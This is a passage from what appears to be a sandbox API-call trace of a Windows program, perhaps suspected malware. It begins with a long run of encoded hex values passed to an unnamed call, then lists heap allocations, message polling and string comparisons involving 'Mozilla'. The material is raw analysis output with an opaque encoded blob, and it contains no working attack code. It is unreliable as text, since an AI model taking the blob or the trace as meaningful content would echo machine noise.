xf5ae\x4f64\xc937\xc6ec\x9c93\x91cd\xbe92\x5ae5\x3d9a\x20ef\x7816\xd510\x97f9\x926\x3608\xa34a\x9175\x1a58\x3d89\xce24\xbb18\xbd20\xed5a\x2174\xed96\xeb62\x20fc\x2c83\xf4da\xfa2d\xa41d\xfcad\x3087\x8407\x808\x2762\x587f\xdd3a\xeb0b\x2c28\x79c2\x92eb\x92ab\xe416\xeb66\x2a69\xd8b4\x4984\xb3ab\x8bf8\xc86a\x6ff8\xa2a1\x4f92\x2d70\xcbca\x7aab\x9dc3\xb30d\x8ac1\x7771\xc43c\xe4d7\x2819\xb746\xb468\xcf86\x99a2\xea36\x621f\x8eb\xd67\xf9a5\x7bb1\x3484\xf38f\xd20a\x483c\x8bf1\xdd40\xcd2c\xa889\x779a\xf5d5\xd548\x4bc\x1af6\x73b4\xd9e7\xcf91\x2f9c\xcd72\x22f9\x8fef\x148f\xb751\x9461\x8fd8\xfda1\x9f85\x1f44\x8b10\x3ae\xc602\xc3a3\x335\x238\x9dc7\x3833\x8ac9\xd2e2\xb129\xc174\x361c\x3fb9\x7417\x204f\xa22d\x1f0b\xcd09\xa276\x9b7f\x75c4\x78cf\x31c3\x6faf\x5c68\x7539\x2213\x38e5\x6585\x942b\x57e6\x4e65\xdb2f\xa1bc\xec9\x99a4\xccab\x56d\x5ad6\x3241\x9457\xb1c\xc7a9\xee8c\x4b7e\xaa13\xa153\xbaf8\x5af2\x2a2f\xa8ee\x1b68\xfb27\xcaaa\x5ac4\x2824\x7a95\xd9b7\xde50\x8ad1\x71d4\x143e\xf68b\xd66a\x555a\x98d9\xc037\x6ca7\x9d9c\xf500\xfba5\x35ad\xcabe\xfac3\xb445\x4530\xecf3\x492d\xc4a2\xdd61\x79a1\x94f6\x55f4\x6b71\x26b9\xe7c3\x2e69\x24f9\xf7bb\x815\x76f1\xd477\x2e15\x1bfc\xc6ca\xec2d\xae1a\xe824\x4823\x11e6\x183c\x3103\x506b\x4219\x355f\xe79a\x65ae\x4fc3\x1ab4\xb2ed\x6b70\x65e8\xa747\x9bb5\x6e0a\x4a03\x75ca\x56e8\xcce\x38c8\x6d62\xaecc\xcf29\xabc5\x254\x9b29\x2d93\x9d08\xae9a\x593c\xcbd3\x131f\xc4a5\x2161\x864\xd934\x7b4c\x75e5\xf694\xb1d0\xa8b4\x8481\x38e6\xa860\x4a92\x7bfe\x5d56\x3fc2\xcf74\x647c\xcb9f\x8f5f\x5bb8\xad9a\x8961\x10a1\x9eb6\xcdcf\x271c\x41df\xe56c\x1b17\x134\xf78\x2f80\xaf9\x77a4\x3f91\x7a94\x5380\xf64c\x7ceb\xa45b\xbe62\xee7c\x1e1e\xa254\x4af3\x4606\x412a\x4df\x4434\x1545\x4b0b\x5f9c\xaa6f\x3e7f\xadea\xf534\x2c56\x1cca\xc9f5\xc26b\x2d77\x1735\xc1c3\xebd4\xc3c5\x1e23\xe6e3\xcb8b\x7019\xa21c\xb22c\xc4c7\x4596\xf90f\x8fb2\x2f79\xcfbe\x30bd\x4db\x6825\x766e\xdd17\x7c63\x5161\xb62a\x7e23\x617c\xefd1\xafc1\xfc02\x6d9a\x617c\xa7d5\x5f1b\xf4d8\x8d2b\x122f\x81f4\xee6\x2c7d\xe3bb\xd307\x188c\x875c\x371c\x70cd\xb01e\x4dbb\x70f3\x538c\x9ff\xe8f\x39ca\xd8cf\x4537\xdfd4\x11e1\xe5e\xdfe1\xf08b\x1833\xc45e\x29c6\x33c2\x950e\xa346\xecd1\xc458\x5e77\xbfd7\x39c8\xeda\xc8ad\xb89e\x925f\x6f72\xe9b5\x7017\x79af\x1260\xedb5\x6236\x46dd\x8d3c\xac25\xb057\x8ed4\x2cc9\xbf80\x7a1\x51d\x86f4\xbb0\xbb2a\x5458\x436\x5b1e\xf6f9\xf406\x4cd3\xebfb\x915f\x75f3\xdfb\xe653\x3d3e\x5d\xa829\x334\x6a49\x66e8\xfb2b\x7bef\xec40\xa695\xee\x3d2d\x3a15\x5eb6\xcb7d\x7d9\xe446\xf274\x6cd2\xf955\x7c3\x57a5\xf468\x686f\xc3a4\x9cc3\xc419\x13f8\x3be\x11d8\x4698\x6ed7\x4ac0\xeebc\xd85\xedfc\x8d1\x9720\x4ea6\x7da\x7e3c\x9a0f\xa86b\x46fd\xb778\x7a36\xacf6\x9cbc\xed14\x7ae0\x5ad5\x61de\x5e63\x43a3\xb732\x6705\xa240\x81d4\x2890\xfbc\xdb97\xff6f\xaa82\x261\x934\xa93d\xf97e\x69b5\x9962\xf4a9\xac69\x3682\xe6ab\xb0c1\x3f9d\x89a0\x23ca\x397\x61c6\x1533\x463\x69bc\xde41\xc854\x54a0\x47f6\x60b7\x5b68\xb790\xc3ad\x7dca\xe2ba\xef3c\xe2b2\x772c\x3e80\x45a9\x1b11\x319d\xb83e\x750c\x1e2\x609b\x4dc6\xaf76\xed0d\xa5f2\xc4cb\x42d6\xf0b6\x8e7e\x73e1\x9abd\xa12e\x4cab\x1ae5\x8c44\xbc5c\x3fb\x31cf\xf5d3\x7c35\xf70b\xa002\x6a97\x36fe\x41c5\x693c\x1bf\x52c5\x481f\xd0cb\x5412\xff69\x3406\x8093\xcd83\x9123\x6163\xdbf6\x4250\xcdca\xa077\x73ff\x93be\xf156\xa964\x313b\x1f59\x8a36\xc59f\x8dc5\x29ba\x5a4e\xa08e\x2d57\x8181\xa346\xc825\xf503\xe9f9\x3872\x7151\xbe5a\x5651\xa4cb\xae97\x2793\xa936\xd95d\x197b\x4432\x9463\x1eff\xc719\x4ce8\x7fa0\xfd83\x7bfa\xc744\xb4cc\x30ed\xe1ee\xe334\xff4\x181\xf60d\xb191\x3fe8\x3442\xb6d\x320f\x7f4e\xe81f\xe68f\x571e\xdd83\x811e\xd9d2\x32b6\xd1d0\x3d25\x1d05\xb227\x978c\x25b0\xf03f\xf3ca\xd4e6\xd8fd\xf1d\x5ba1\x9d3\xfe3d\xccb6\xbf71\x4bd9\x85df\xb586\xe78c\x1b63\x955a\x8242\x6d13\xb824\x5d6\x6dbc\xee13\x28a2\x6b1b\x7c16\x57f3\xa7e4\xc237\x64e8\x599e\x1b67\x55e\x647a\x5a1d\xbe43\xa121\x6c7\x3143\xb19b\xeb35\xb96c\xccfc\x3115\x77\xbce0\x9026\xf19d\x56be\xd7a1\x65dc\xf6c2\x2657\x7f6c\x39a5\xdb51\x315f\xb4f7\x493f\x36fd\xdeae\x699b\xfe1b\x492c\x245b\x9aee\x54ac\x158c\xd59b\x5da8\xc957\xf6b8\x7ad7\x4aea\x5bbe\x75e7\xaacf\xbaf7\x5d8b\x6598\x7856\x1784\x9ef\xde51\xc6c\x7aa7\x4b9a\xd2fb\x7ada\x4a6f\xcbb1\x4904\x71af\x97c9\xd8c4\x5966\xa967\x9a8\x4fbc\xd927\x4db8\xf711\x8be4\x96c5\x657c\x85b1\xdfdb\xbe22\xc2f9\x36b8\xe348\xc7c6\x93c\x1032\xcfa\xe8e\x2adf\xf90f\xb98a\xcc0a\xcbb7\x45b1\x5a5e\xdd97\x2fc4\xd9a2\xffef\x2c91\xc595\x7250\x5cef\x356a\x5dee\x3245\xe73e\x4e47\x2be6\x42d6\x62a1\x757e\x2c03\x4f1b\xa361\xe848\xc1e6\x665a\x974b\xd645\xca93\x38fa\x75d5\xc75e\xe1e7\x2ed4\x458b\x9677\x71f5\xb041\xe7cf\xe555\x4a38\xc4e1\x72fa\x13b1\x3dc7\x2cb1\x6cc4\x340e\x6f85\xf904\x4a02\x86f0\xbc26\x86a0\x5cf2\xf746\xa5e0\x280e\x3426\x15c1\x514e\xd431\x4a17\x4d09\x3f68\xcab\xad10\x8460\x95f7\x1034\x2a1a\x988e\x9d3c\x428d\x2a48\x998b\xcf3c\x43f2\x98e3\xfec6\x87dc\x6ecb\xb534\x340a\x4aed\x4f4e\x59c8\x91ab\x2538\x3edc\x167e\x3389\xdf7c\x54a6\xbb2e\xe51f\xa886\x417\xe2c1\x78f8\x3586\xd200\x13e9\x8fb8\xa75c\x1c99\x818\xc962\xe393\xc990\x2ca2\x69e7\xedd4\x92ac\x5f71\xdfc7\x7623\x1f06\x79e1\x7da9\xf3d\xdd79\x9d59\x70a6\x1187\xfc35\x98ee\x57f0\x8475\xb8a6\xf3d8\xe2ad\x217e\xc700\xb7f6\x7b63\x3d44\xf277\x5644\x93af\xd1aa\xb262\x7e36\xb37c\xa593\x6673\xfbf6\xbe6a\xc257\x7e06\x9a6f\xda5e\xc9e9\x29b7\x8715\x7f71\x320\xce65\xb947\xb241\xdb2d\xf2e4\x237f\xb6a7\xa2b5\xcd7d\x5ba1\x306c\x2b0d\x6dd0\x5d05\xd056\x573\x565d\x75d0\x5d05\xd056\x575\x565d\x75d0\x5d05\xd056\x575\x565d\x75d0\x9d45\xb7eb\x4236\x3154\x7544\x59e2\x2049\x8db7\xbbd\x3422\xcf0f\xb93f\x1e82\x7810\x1054\xefe3\x1195\xbba3\xe051\xe34e\x78ed\x5aac\x96ac\x23c4\x9d4b\x9f66\xbf40\x9448\xb3df\x861b\xcc74\x78e7\x1135\x5def\x69a7\x5aed\xf38b\x5166\xed2a\x6e32\xbc96\x45e5\xa52d\xad12\xef61\xa0e0\xf142\xbeb3\x8980\xf9a3\xd036\xef77\x2590\xef9a\xda08\xdca7\x9381\x2064\x83d2\x3228\xa315\x820f\x505e\x8af5\xe269\x637a\xb29c\x4caf\xd583\xd948\x9de8\xb292\xd40\x9056\x200d\x987e\xc2db\xd09f\x883\x3f2f\xdc85\xe569\x9005\x9d64\x7077\x84fa\xaaa\xef39\x9e49\x63e0\x4ef4\x372f\x3311\xe57\x4524\xeb2d\x62a\x723\x14c2\x4f85\x8a41\xf086\xb047\xaf02\x2f1f\xb04b\x77be\xb52a\xd9b2\xbd88\x5d4b\x3105\x77a2\x3e33\xdec3\xbb0d\x3c7f\xdd76\xcd0a\x247f\xe20c\xa644\x6dd1\x2e06\x2181\x7b19\x263d\x48fc\x3ee7\x191a\x9690\xfa7d\x546d\x8f2\xb3db\xa261\x554d\x5cb8\x1dc4\xc202\xd873\xc5b3\x569a\x9117\xee7f\xbb73\xfce2\x2130\xfdad\xd9d7\xfe11\xddc6\xdfdd\x4767\xa24e\x8882\x12d3\xc548\x6eca\x653e\x1d9a\xb5e\xcc4e\x23a8\x3130\x4bf4\xab75\xe4d8\x9edb\xa39b\xa054\x9b2b\xfd6a\xc40a\x2cdf\x7e3\xc97b\xd0d1\xe923\x5816\x3d7b\xca0d\x9c5a\x6554\x8b63\x5699\x8afc\x9160\x5936\x4658\x685d\x2d15\x448d\x38a\x53da\x71d2\x4eb\x9787\x7fbd\xf01d\xe5a1\xedc0\x85ff\xe4f3\x85cd\x5591\xfed6\x6229\xbd54\x2f24\x7747\xa25f\xe6e7\x94e5\x7ac8\xf2b6\xc3e6\x7032\x8b54\xd3d7\x74b0\xee18\x900e\x7e50\x13a\x3db9\x5bb3\xa50d\x58dc\xb0e6\xadf9\xfe0d\x96cc\x77c0\x6fc8\x72f2\x4c6\x6980\xfe5\x74d9\xdd06\x1c5e\x288e\x4e90\x95b1\xbc77\x2b02\x4829\x1d76\xdd36\x7465\x82a4\xddde\xdba4\xad09\x8f0f\x3180\xdd5a\xa304\x183c\xc1ef\x17c2\x64c0\x1dfb\x92f8\x2f08\x135a\x12e2\x2947\x706f\x23b9\xd6c\x3a96\x6848\x8a79\xb1b2\x2f9e\xb054\x754a\x7560\x63b9\xb8bf\x964d\xca94\xa33f\x383f\x78c8\x9edf\xeddd\xaf4f\xac05\xb77d\xf800\x53ae\x5d0b\x7288\xbde4\xe730\xe36f\x8015\xdafe\x6d4f\xd605\x3f66\xa3dd\x5ce6\xe7ad\xbef1\x8f5f\xc6fd\xc4c5\xa9eb\xea59\x85f6\x650a\xa055\xe967\x7520\x825d\xdacf\x3aa0\x43bc\x31d2\xcf81\x107a\x2cd2\x8f69\x410e\xdf8d\x75a8\x5814\xf84f\xbf33\xbc0a\x306\xcd8d\xff2e\x778a\xb47f\x95f1\x1f4d\x7c6a\xaa95\x9aa7\x12d\xf9e8\xdc58\xc29e\x8f9e\x1bd5\xcf45\x16c7\x8a35\x8f9e\xd69d\xab88\xe1c0\x3cc8\x5f41\xa652\xc684\xdc8d\x562c\xaf67\x8dd2\x9b07\x7e43\x3f8b\x60f3\x2be0\xa444\xbba7\x6771\x9c57\x2e1\x5d66\xdb4\xb599\x39d8\xcf85\x1222\x35dd\xce15\xe7b6\xab8\x21d\xbb3d\xe97d\x8e0a\xa07b\x1068\x77c5\x812\xf5e8\xf95b\xa709\x8b80\xfead\x34d2\x56c5\x745\x71be\xcab3\x4d57\xecc8\xab52\x9120\x1b46\xdb70\xfed3\x4c72\xbed4\xd73c\x1ee\x800e\x4fae\xeccd\x6fc1\xd4f0\x9e81\xfe1a\x5b2b\x1c77\xb09\x2c37\xead8\x2bd8\x4262\x367f\x5205\x5fb1\x22c6\xbaa3\xbc59\xd22f\xeff9\xfaaf\x941a\x59e1\x3c56\xd529\x3514\x54bd\x12f5\x73f2\x4173\x9e7\xe1ad\x21f2\xf8c8\xd928\x8d1f\x4186\xb7ac\xdc01\xa7ea\xf1e8\x54aa\xc4dc\x166d\xa3aa\x8b00\xd151\x6248\xdb74\xa903\xd05a\x80ef\xf415\x8efb\x112c\xb25\x6265\xaf04\xafe7\xf2af\xebe5\x5c5f\x7e0e\x6c8\xf082\xb8d7\x96ab\x6bc5\x8437\xbde0\xa9cd\x3505\x374b\x3f29\xd585\xf8ae\x3cbc\x31f7\xaa49\x5ba1\x5050\x280e\x60d\xd3e\x9a14\x825f\xf2af\xf5dc\x8c00\x9746\xf463\x1e3a\x38fd\xa746\x6888\x32dc\x2f0e\xcf29\x75fd\x5c5c\xc625\x53dd\x1b9e\x8b8a\x3143\x7c39\x7953\xafee\xe2e2\x62d6\xf5dc\xb9e5\xc44f\x61c5\xe10d\xca4b\xff73\xe96d\xb89\x5c61\xf2ff\x37dc\x2e30\xc449\x863d\xc02b\x37af\x4f44\xa8dc\x6b66\xf790\x9c22\x8384\x204\xc41c\x2090\x931f\xb68e\x233\xcf2d\x1923\xa356\x8403\x31a7\x4890\x3b1b\x3cdc\xe819\x3804\xa303\x2165\xf40b\x26e0\xe7f5\xf6a0\x676b\xb68f\xca23\x214d\xb422\x844a\x8b66\xb150\x2d08\xa114\x447b\x58a8\x6684\xd088\x1132\xc89a\xb443\xa22c\xdb54\x58d9\xf111\xb8a2\xe2cd\x77ba\x5a39\xfc40\x8830\x9adf\x162a\xf9fc\x729f\x8549\x490a\x4505\xc811\x217a\xa42e\x2083\x37cf\x71d9\x4a02\xfb02\x11cf\x1d5c\x985b\xbfeb\x2c40\xd91c\x112f\xb7d9\x9c70\x3d03\x132b\x128d\x1eb9\x69ac\x177c\x7e30\x87d\xf294\x783\x80f\xeb76\x8d7d\x411b\xc0fd\xab14\x2573\xbd69\x6128\x973f\x9a2d\xd559\xa111\x4554\x2289\x17a6\xd4d1\xaea7\x2585\xa4f0\x8fa9\x8140\x2fa7\xf7b\xa76a\x65a9\xcad7\xe0fc\x5ed6\xc9f6\x457f\x4f09\xf0b\xd8b4\xcbe\x2c1b\xcf45\xe0e1\xaabe\x593\xa21a\x30d7\x9a42\x1b1e\x9987\xc1f6\x30f3\xa916\x4257\xb489\x2d9b\xc5e5\x5cf1\x6093\xe075\x7aa7\xd258\x68e1\x3ea4\xa686\x78da\xaddd\xa16c\x39a8\x9c72\x4ae7\xe4ae\x3cd4\x648f\xc531\x661\xe1ad\xf644\x8fcf\x300\xe30e\x95d2\x3bf1\xace9\x957b\x9e76\x5feb\xb219\x5e3f\xfdc7\x7175\x8cce\x9dbb\x8352\x217a\xd877\x8ae3\x7719\xc3d8\xe0b\x417\xe7cb\xc371\xf968\x392f\xb517\x194f\x4283\x3962\x449f\x25e3\x6d14\x2125\xae26\x98fd\x8fcf\x421\x48a0\xdde4\x469f\xefa7\x1c17\x8c1c\x5f4e\xd800\xfd9a\xebc6\x2cb1\x4783\x8a51\xe60f\x2ebd\x5d36\x3ea3\xd315\xd674\x4ed9\x5df6\x703d\x57b9\xe13e\xf10c\x124e\xed4a\x1a03\xfb2f\x1216\xed07\x5def\xf323\x193\xf893\xa50\xc85f\x87cd\xe362\x4599\xdf53\x46b8\x678c\x7ffa\xfe78\xc48b\x7bb5\xe11f\x32dd\xc569\xc5cf\x53c6\x7598\x5912\xa89f\x2cf6\x33fc\x668f\xd4d0\x6b92\x8a04\xb0a4\xa1e7\x234e\x6ef5\x7308\xb62f\x468e\x224\x6348\x4da6\x9e7c\x412b\x9178\xfda6\xd32f\x5d61\xaa7d\xd696\xfb0a\x31a3\x59ea\x9088\xf97a\x4556\xe6e5\xaeb9\xe588\xfca7\xd0a8\xe7c4\xc9b9\x64a6\xc4ec\x2868\xfd7a\xd9d6\x4848\xbd07\x7a1\xf11a\xde7c\x6dc7\xb1d8\xae46\xf90f\xffb2\x5883\x9834\xd284\xf892\xee68\xff64\x1cbc\x7246\xb23d\x17d8\x3c84\x3579\xebd4\x5e0d\xd171\x602f\xec04\xb252\xdce0\xbb9\x2560\x9296\xd188\xf4c7\xef06\x294e\x3bbb\x6ca7\x9a9d\x5ee3\xa55d\xe6\x3724\x929\xb62\x55bd\x6b77\xfd78\x6e10\xc2c9\xb1b4\xb269\x7e14\x550b\x5049\xad32\x6830\xbc0b\xafb9\x9fb8\xb6e0\x9f7\x9d9c\xb857\x159f\x8917\x152a\x7357\x7b1b\xdb1\xe1ef\x21ca\x5945\x6b7e\xae17\x793c\x56ea\x7abc\x9bd7\xe39b\xb455\x2d9c\xeedc\x5303\xcded\xbf1d\x816a\xad2c\x252c\x6b68\xc5df\x387e\xd3d8\x6e47\xf561\xf1d2\x4077\xf082\x5234\xfb4\xe344\xa03b\xfe29\xada0\x2bd5\x315f\x171\xee1a\xad6d\x7d3d\xecbb\xbedc\xbf9d\xe14f\xb306\x5c2e\xd2a6\xbdef\x8b78\x16a0\x22ba\x8a01\x3d55\xcae6\x84a5\x25f6\xd521\x6042\x5ab9\x5532\x4aed\xf590\xf029\x8ed\x9924\xbf69\x2dfc\x90b7\x407a\xc69c\x5b43\xddb5\xe376\xe1e3\xd164\xd9a1\xeb7e\xefed\x914a\x9ae3\x2409\x568\xa779\x1f2a\xae84\xce29\x2398\x9bc1\xc40\x7e66\xd98a\x7280\xdfb9\x17ac\x6383\x73d4\x2289\x5c2f\x6d11\x5f8a\x7adc\x9864\x2556\xf784\x9207\x13a2\xd164\xb347\x7589\xbcd8\x72a9\xeb4\x82b\xa2b7\x4e85\x9de5\x877c\x99b2\x4225\xfc7d\x5c10\xbe7d\x3ca3\x8934\x549f\x6a33\xabbf\x82ee\x2ab2\xc54d\x68db\xdda6\x1bfe\xa971\xa00\xc6a5\x7949\x44c9\xb87e\xe9ff\xf0df\xe53e\x416a\x5d90\x8c6b\x4b6e\xfa0\x6916\xe634\x5385\x6e8c\x206b\x8449\x671c\xe7f7\x76b3\x9fde\xc5f0\xd491\xd700\x8f50\x3fb2\x4335\xd058\x6ef1\x4e8a\x706f\x85d9\xcba2\x971d\x7a41\xd981\x1e37\x85c1\xd50b\x1ae2\xb52e\x1cf\xb895\x334\xe354\x2ac\x945a\x7313\x3b55\x2f8f\x905\xbf8d\x50b3\xde96\xe3c9\x3f08\xd51c\xebdd\xc848\xd9c0\xf0f\x9633\x48a7\x127a\xd236\xeb4c\x67c\x2413\xa312\x766e\x3914\x4ada\xe140\xd851\xe42a\xc60d\x12a5\xcb3f\xee6c\x540e\x239f\xc530\x65d9\xa351\xc635\x988f\x668f\x3b36\xe47b\x9e28\x1db0\xc1ff\xe8d4\x11de\x4e8a\xeb07\xbbed\x7501\x3780\x78cf\x9f96\x3fc5\xb680\xe0cd\xf7f8\xf8f2\x1045\xbdba\x23cc\xac05\x1e84\xdf41\x822b\x8c46\xb13c\x2183\xb22e\xb174\x3e72\xb8c9\x6fc2\xc532\x70df\x39e2\x7a5e\x292b\xd0d2\xf32b\x59a4\x137a\xd09\x4e38\x7b3c\x7c4a\x9620\x3bb1\x440e\x595d\xb1f4\xc85a\xd9d6\xae53\xbab8\x9450\xc99a\x2cbd\x4fd1\xfc7b\xd0e5\x3c12\xea96\xc3ca\xe653\x2b61\xe07a\x31e2\x121f\xc5d5\xaaee\xe9fb\x6473\xa2fc\x2b0\x1b3c\xadd7\x971a\xe248\x4f2a\x7235\xa84a\xaf72\xa89e\x2d05\x187e\xecce\x6563\x119e\x7e81\x35d9\xc795\xdef2\x811c\x3017\x7598\x8594\x53af\x4cd\xbd5c\xd713\xab59\x8912\xa0d9\x99bc\x808d\xecdd\xdf4\xf51c\x9ffa\x705\xf720\xae7b\x163c\x7bf8\xd95e\x9719\x9e\x7ddf\x7f02\x34c0\xea7d\x9927\xd852\xcc4a\xece6\x182e\xa558\x7d02\xcb4e\x2e3c\xe61c\x13e\x643b\x1f0d\xf1e7\xc2f5\xac76\xfa27\x3783\xdb62\xd354\x8ee6\xaa18\x98c2\xaccc\xf32d\xaedc\x6177\xc783\xec56\xc08\xecab\xa902\x943b\x972f\x8ce5\x6280\x5b68\x1938\xa927\xbb2\x417a\xf73b\x8474\x669d\xd613\x509f\x789f\x343b\x5a11\x120c\xd1fe\xd675\x1a8a\xab5d\xaec\xc638\x74b9\xb8ef\x7a3e\x8c1e\x35c6\x3bca\xcc8d\x8375\x5890\xa086\xbf04\xcd0e\xbc80\x906b\xd22f\x70c9\x4012\x2012\xa21e\xffb0\x5d66\x1dc7\xb77c\xd785\x8921\x1db4\x2183\x7b0a\xf361\xc603\x1762\xe67e\xdb88\x64f9\x407d\xbbe0\x11ef\x5c08\x81df\x33a8\xf4ac\x1906\x741d\xdc40\x10b9\x8ad7\xc37f\x8ca8\xaf1b\x605b\x61e4\x5c5d\x2efc\x31a4\x88eb\xdb5\x177b\x2cf8\x4934\xd7e6\x909e\x46a2\xcf76\x815e\x417a\x1b3b\x882f\x2b7c\xe714\xe286\xcc60\x42f5\x7ecc\x6415\xf32f\xf8c\xcb15\x95fa\xe8a4\xa8cb\x2e3f\x14bb\x6b3\x5df9\x7702\xd3f0\x713\xf0\x3f45\x567e\x303c\x138f\x5163\x543d\xd48a\x11b2\x6d0a\x2f19\xaaae\x4168\x376c\x6d46\xcf1d\xa27d\x952e\xec1a\xdd4f\xb31d\x9f70\xd5c7\x770f\xa661\x6240\xb4f6\x78c8\x6603\x48ec\x5ee3\x677d\xfab9\xd85d\xf516\xbd4b\xeddd\x1c8a\xc569\xa59b\x8c07\xfdc4\xf9a0\x12e9\x32d9\xe5e6\x5723\x6fc\x5f0f\xea79\xf02\x5090\xba41\xb699\x49f6\x90ec\x1d2f\xa58f\x699a\xa059\xd047\x721a\xbe35\x7bcf\xef92\xbb01\x61a2\xc20d\xe7d4\xb522\xc0ed\xab7\x249c\xde1b\x7db3\xacf0\x528d\xa43a\x91f\xec81\x5a9e\xe288\x85ad\x7de1\x847c\xe3b8\xa082\x6a3b\xbed0\x846e\xcf0\xa3b8\xc7ee\xc3fc\xccf3\xefb4\xcd7e\xbeef\xac16\x7a21\x4195\xac1b\x59d3\x5578\x9d50\xde05\x3b2\xb15d\xa3b7\x162\x6cca\xb8d3\xe78f\xd39e\x851a\xf161\xa686\xd9c8\x5e4d\xd57e\xd881\x9df6\x4f8\x3dce\x37e3\xc281\x1e3c\xc6e1\xd440\x7556\x9795\xb3c0\x3663\xceae\x3766\xcdf1\xe117\x9d44\x4fc\xdd9f\xf464\x4c0f\x8fdc\xf7\x7176\xb3ef\xbfe9\xda16\x326b\xf90f\x1d7e\xcb9d\xb8c2\x8913\x6978\xbf1f\xe075\xee4e\xbc2f\xab0\x17af\x4104\x3cab\xbb97\xcf80\x1e30\xb74a\x6e05\xaaa2\xaeb\xb3c\xcb06\x52d6\x5095\x6f15\xd071\xe441\xb428\x2101\xc60e\x614b\xd4e8\xbc1c\x86fc\x33fa\xbdcc\xc3eb\xd8c3\x5461\xba29\x2724\xc91e\x6153\x7525\xe960\x8409\x66ca\x33a1\x9b2\x73d8\xeeee\x66a2\xf864\xcf76\xf3a6\x87dd\x6a37\x3893\x34cb\x120a\xbef5\x2663\x5379\x39dc\x4a4\xc700\x21ce\x37f9\xef9d\x521c\x4e6c\xfe3\x1724\xf46a\xf72d\x7c8b\xec7d\xe8d0\x5d7\x1db4\x3faf\x4505\x20a3\xa676\xbb34\x8f0e\x3fb2\xdeea\xa7c0\xdfa\xabf7\x66e2\x2a0\x51e8\x7e5f\xb3e8\x2915\x21e8\x5ea0\x8596\x49ca\x4dd1\x1a29\xac7a\xaed7\xd47b\x86dd\x91fc\xaf6e\xcbe2\xa3c6\xa16e\x81a0\x49ae")) returned 0 [0248.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0248.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0248.215] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0248.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0248.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0248.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0248.216] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0248.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0248.216] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0248.216] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0248.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0248.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0248.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0248.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0248.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0248.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0248.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0248.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0248.216] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0248.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0248.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0248.216] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0248.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0248.217] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mozilla", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0248.217] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ozilla", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0248.217] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zilla", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0248.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0248.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0248.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0248.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0248.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0248.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0248.217] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0248.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d760 [0248.217] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0248.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0248.217] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 